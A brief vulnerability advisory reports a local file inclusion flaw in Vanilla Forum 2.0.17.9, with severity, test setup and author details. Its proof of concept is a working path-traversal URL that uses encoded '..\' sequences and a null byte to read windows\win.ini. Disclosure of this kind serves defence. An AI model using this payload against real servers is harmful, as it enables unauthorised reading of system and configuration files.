————————————————————————
Software…………….Vanilla Forum 2.0.17.9
Vulnerability………..Local File Inclusion
Threat Level…………Critical (4/5)
Download…………….http://www.vanillaforums.com/
Discovery Date……….5/15/2011
Tested On……………Windows Vista + XAMPP
————————————————————————
Author………………AutoSec Tools
Site………………..http://www.autosectools.com/
Email……………….John Leitch <john@autosectools.com>
————————————————————————
–Description–
A local file inclusion vulnerability in Vanilla Forum 2.0.17.9 can be
exploited to include arbitrary files.
–PoC–
http://localhost/vanilla/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
0 条评论。